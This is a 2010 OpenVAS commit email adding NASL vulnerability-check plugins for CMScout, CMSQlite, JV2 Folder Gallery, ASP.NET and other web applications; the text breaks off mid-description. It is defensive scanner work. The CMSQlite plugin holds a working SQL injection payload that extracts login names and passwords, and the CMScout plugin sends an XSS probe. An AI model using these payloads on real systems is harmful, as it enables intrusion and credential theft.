[Openvas-commits] r7970 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Jun 9 08:34:57 CEST 2010
Author: chandra
Date: 2010-06-09 08:34:53 +0200 (Wed, 09 Jun 2010)
New Revision: 7970
Added:
trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/cpe.inc
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/ChangeLog 2010-06-09 06:34:53 UTC (rev 7970)
@@ -1,3 +1,22 @@
+2010-06-09 Chandrashekhar B <bchandra at secpod.com>
+
+ * scripts/gb_pacific_timesheet_csrf_vuln.nasl,
+ scripts/gb_jv2_folder_gallery_rfi_vuln.nasl,
+ scripts/gb_cmscout_xss_vuln.nasl,
+ scripts/gb_ms_asp_dotnet_xss_vuln.nasl,
+ scripts/gb_pacific_timesheet_detect.nasl,
+ scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl,
+ scripts/gb_ms_dotnet_xss_vuln.nasl,
+ scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl,
+ scripts/gb_snipegallery_remote_file_include_vuln.nasl,
+ scripts/gb_jv2_folder_gallery_detect.nasl,
+ scripts/gb_cmscout_detect.nasl,
+ scripts/gb_snipegallery_detect.nasl:
+ Added new plugins.
+
+ * scripts/cpe.inc:
+ Added new CPE's.
+
2010-06-07 Chandrashekhar B <bchandra at secpod.com>
* scripts/gb_ubuntu_USN_947_1.nasl,
Modified: trunk/openvas-plugins/scripts/cpe.inc
===================================================================
--- trunk/openvas-plugins/scripts/cpe.inc 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/cpe.inc 2010-06-09 06:34:53 UTC (rev 7970)
@@ -839,7 +839,11 @@
"www/*//HP/OVNNM/Ver", "^([0-9.]+)", "cpe:/a:hp:openview_network_node_manager:",
"Mathematica/Ver", "^([0-9.]+)", "cpe:/a:wolfram_research:mathematica:",
"OrbitDownloader/Ver", "^([0-9.]+)", "cpe:/a:orbitdownloader:orbit_downloader:",
-"www/*//Uniform-Server", "^([0-9.]+)", ""
+"www/*//Uniform-Server", "^([0-9.]+)", "cpe:/a:uniformserver:uniformserver:",
+"www/*/JV2/Folder/Gallery", "^([0-9.]+)", "cpe:/a:jv2design:jv2_folder_gallery:",
+"www/*/snipegallery", "^([0-9.]+)", "cpe:/a:snipegallery:snipe_gallery:",
+"www/*/pacificTimeSheet/Ver", "^([0-9.]+)", "cpe:/a:pacifictimesheet:pacific_timesheet:",
+"www/*/CMScout", "^([0-9.]+)", "cpe:/a:cmscout:cmscout:"
);
Added: trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,74 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmscout_detect.nasl 9416 2010-06-08 15:10:36Z jun $
+#
+# CMScout Version Detection
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800790);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("CMScout Version Detection");
+ desc = "
+ Overview: This script finds the installed CMScout version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of CMScout in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+
+cmsPort = get_http_port(default:80);
+if(!cmsPort){
+ exit(0);
+}
+
+foreach path (make_list("/", "/cmscout", "/cmscout", cgi_dirs()))
+{
+ ## Send and receive response
+ sndReq = http_get(item:string(path, "/index.php"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the application
+ if(":: CMScout ::" >< rcvRes || ">Welcome to CMScout" >< rcvRes)
+ {
+ ## Grep for the version
+ cmsVer = eregmatch(pattern:"CMScout ([0-9.]+)", string:rcvRes);
+ if(cmsVer[1] != NULL)
+ {
+ ## Set the KB value
+ set_kb_item(port:cmsPort, name:"www/" + cmsPort + "/CMScout", value:cmsVer[1]
+ + " under " + path);
+ security_note(data:"CMScout version " + cmsVer[1] +
+ " running at location " + path + " was detected on the host");
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,116 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmscout_xss_vuln.nasl 9416 2010-06-07 16:13:29 jun $
+#
+# CMScout Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+################################i###############################################
+
+if(description)
+{
+ script_id(800791);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2154");
+ script_bugtraq_id(40442);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("CMScout Cross-Site Scripting Vulnerability");
+ desc = "
+ Overview: This host is running CMScout and is prone to Cross Site Scripting
+ Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an input validation error in the 'search' module when
+ processing the 'search' parameter in 'index.php' page.
+
+ Impact:
+ Successful exploitation will let the attacker to execute arbitrary script
+ code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ CMScout version 2.09 and prior.
+
+ Fix: No solution or patch is available as on 07th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.cmscout.co.za/
+
+ References:
+ http://secunia.com/advisories/39986
+ http://xforce.iss.net/xforce/xfdb/58996
+ http://www.exploit-db.com/exploits/12806/
+ http://www.vupen.com/english/advisories/2010/1288 ";
+
+ script_description(desc);
+ script_summary("Check the exploit string on CMScout");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_cmscout_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+cmsPort = get_http_port(default:80);
+if(!cmsPort){
+ exit(0);
+}
+
+cmsVer = get_kb_item("www/" + cmsPort + "/CMScout");
+if(!cmsVer){
+ exit(0);
+}
+
+cmsVer = eregmatch(pattern:"^(.+) under (/.*)$", string:cmsVer);
+if(cmsVer[2] != NULL)
+{
+ filename = string(cmsVer[2] + "/index.php?page=search&menuid=5");
+ host = get_host_name();
+ authVariables = "search=OpenVAS+XSS+Testing&content=1&Submit=Search";
+
+ ## Construct XSS Request
+ sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+ "Host: ", host, "\r\n",
+ "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4\r\n",
+ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+ "Accept-Language: en-us,en;q=0.5\r\n",
+ "Accept-Encoding: gzip,deflate\r\n",
+ "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+ "Keep-Alive: 300\r\n",
+ "Connection: keep-alive\r\n",
+ "Referer: http://", host, filename, "\r\n",
+ "Cookie: cmscout2=1f9f3e24745df5907a131c9acb41e5ef\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(authVariables), "\r\n\r\n",
+ authVariables);
+ rcvRes = http_keepalive_send_recv(port:cmsPort, data:sndReq);
+
+ ## Checking the response for exploit string
+ if("(OpenVAS XSS Testing)" >< rcvRes){
+ security_warning(cmsPort);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,104 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 9311 2010-06-04 15:50:29 jun $
+#
+# CMSQlite 'index.php' SQL Injection and Directory Traversal Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800789);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2095", "CVE-2010-2096");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("CMSQlite 'index.php' SQL Injection and Directory Traversal Vulnerabilities");
+ desc = "
+ Overview: This host is running CMSQlite and is prone to multiple SQL injection
+ and directory traversal vulnerabilities.
+
+ Vulnerability Insight:
+ The flaws are due to,
+ - Improper validation of user supplied input to 'c' parameter in 'index.php',
+ allows attackers to execute SQL commands.
+ - Improper validation of user supplied input to 'mod' parameter in 'index.php',
+ allows attackers to include and execute local files.
+
+ Impact:
+ Successful exploitation will allow attackers to execute SQL commands and
+ arbitrary local files.
+
+ Impact Level: Application.
+
+ Affected Software:
+ CMSQlite version 1.2 and prior.
+
+ Fix: No solution or patch is available as on 04th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.cmsqlite.net/
+
+ References:
+ http://php-security.org/2010/05/15/mops-2010-029-cmsqlite-c-parameter-sql-injection-vulnerability/index.html
+ http://php-security.org/2010/05/15/mops-2010-030-cmsqlite-mod-parameter-local-file-inclusion-vulnerability/index.html ";
+
+ script_description(desc);
+ script_summary("Check the exploit string on CMSQlite");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_require_ports("Services/www", 80);
+ script_family("Web application abuses");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+cmsPort = get_http_port(default:80);
+if(!get_port_state(cmsPort)){
+ exit(0);
+}
+
+foreach path (make_list("/", "/cmsqlite", "/cmsqlite10", cgi_dirs()))
+{
+ ## Send and receive response
+ sndReq = http_get(item:string(path, "/index.php"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the application
+ if(">CMSQlite<" >< rcvRes)
+ {
+ ## Try an exploit
+ sndReq = http_get(item:string(path, "/index.php?c=2-2%20UNION%20ALL%20" +
+ "SELECT%202,name%20||%20password,%203,4,5,6%20FR" +
+ "OM%20login%20limit%201%20--%20x"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the vulnerability
+ if(!isnull(rcvRes) && eregmatch(pattern:">admin.*</",string:rcvRes))
+ {
+ security_hole(cmsPort);
+ exit(0);
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,77 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_jv2_folder_gallery_detect.nasl 9370 2010-06-03 10:10:36Z june $
+#
+# JV2 Folder Gallery Version Detection
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801350);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("JV2 Folder Gallery Version Detection");
+ desc = "
+ Overview: This script finds the running JV2 Folder Gallery version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of JV2 Folder Gallery in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+
+jfgPort = get_http_port(default:80);
+
+if(!jfgPort){
+ jfgPort = 80;
+}
+
+if(!get_port_state(jfgPort)){
+ exit(0);
+}
+
+foreach dir (make_list("/gallery", "/foldergallery", "/Gallery", cgi_dirs()))
+{
+ sndReq = http_get(item:dir + "/index.php", port:jfgPort);
+ rcvRes = http_send_recv(port:jfgPort, data:sndReq);
+
+ if(">JV2 Folder Gallery<" >< rcvRes)
+ {
+ jfgVer = eregmatch(pattern:"> v ([0-9.]+)", string:rcvRes);
+ if(jfgVer[1] != NULL)
+ {
+ set_kb_item(port:jfgPort, name:"www/" + jfgPort + "/JV2/Folder/Gallery",
+ value:jfgVer[1] + " under " + dir);
+ security_note(data:"JV2 Folder Gallery version " + jfgVer[1] +
+ " running at location " + dir + " was detected on the host");
+
+ }
+ }
+}
+
Property changes on: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_jv2_folder_gallery_rfi_vuln.nasl 9370 2010-06-03 15:11:27Z June $
+#
+# JV2 Folder Gallery 'lang_file' Parameter Remote File Inclusion Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801351);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2127");
+ script_bugtraq_id(40339);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("JV2 Folder Gallery 'lang_file' Parameter Remote File Inclusion Vulnerability");
+ desc = "
+ Overview: The host is running JV2 Folder Gallery and is prone to remote
+ file inclusion vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper sanitization of user supplied input in
+ 'lang_file' parameter in 'gallery/gallery.php' while including external
+ files for processing.
+
+ Impact:
+ Successful exploitation could allow remote attackers to execute arbitrary
+ PHP code via a URL in the lang_file parameter.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ JV2 Folder Gallery version 3.1 and prior.
+
+ Fix: No solution or patch is available as on 03rd June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://foldergallery.jv2.net/Download/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/58807
+ http://www.exploit-db.com/exploits/12688
+ http://packetstormsecurity.org/1005-exploits/jv2foldergallery-rfi.txt ";
+
+ script_description(desc);
+ script_summary("Check for the version JV2 Folder Gallery");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_jv2_folder_gallery_detect.nasl");
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+vfgPort = get_http_port(default:80);
+if(!vfgPort){
+ exit(0);
+}
+
+vfgVer = get_kb_item("www/" + vfgPort + "/JV2/Folder/Gallery");
+if(!vfgVer){
+ exit(0);
+}
+
+vfgVer = eregmatch(pattern:"^(.+) under (/.*)$", string:vfgVer);
+if(vfgVer[1] != NULL)
+{
+ if(version_is_less_equal(version:vfgVer[1], test_version:"3.1")){
+ security_hole(vfgPort);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-04 10:13:17Z jun $
+#
+# Microsoft ASP.NET Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801342);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2084");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft ASP.NET Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft ASP .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the handling of 'HtmlContainerControl', which
+ does not prevent setting the 'InnerHtml' property on a control that inherits
+ from HtmlContainerControl when processing the vectors related to an attribute.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
+ attacks against the form control via vectors related to an attribute.
+
+ Affected Software/OS:
+ Microsoft ASP.NET version 2.0 and prior.
+
+ Fix: No solution or patch is available as on 04th Jun, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ http://en.securitylab.ru/nvd/394300.php
+ https://launchpad.net/bugs/cve/2010-2084
+ http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/03/30/configuration-is-half-the-battle-asp-net-and-cross-site-scripting.aspx ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft ASP .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "aspNET/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
+aspdotnetVer = get_kb_item("aspNET/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft ASP.NET version less than or equal 2.0
+if(version_is_less_equal(version:aspdotnetVer, test_version:"2.0")){
+ security_warning(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-01 10:13:17Z jun $
+#
+# Microsoft .NET '__VIEWSTATE' Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801344);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2088");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the handling of the '__VIEWSTATE' parameter
+ in 'ASP.NET', which does not properly handle an unencrypted view state.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
+ attacks against the form control via the __VIEWSTATE parameter.
+
+ Affected Software/OS:
+ Microsoft .NET version 3.5 and prior.
+
+ Fix: No solution or patch is available as on 31st May, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt
+ http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "dotNet/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
+dotNet = get_kb_item("dotNet/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft .NET version less than or equal 3.5
+if(version_is_less_equal(version:dotNet, test_version:"3.5")){
+ security_warning(0);
+}
+
Property changes on: trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_dotnet_xss_vuln.nasl 2010-06-01 10:13:17Z jun $
+#
+# Microsoft .NET 'ASP.NET' Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801345);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2085");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the default configuration of 'ASP.NET' it
+ has a value of FALSE for the EnableViewStateMac property when processing the
+ '__VIEWSTATE' parameter.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
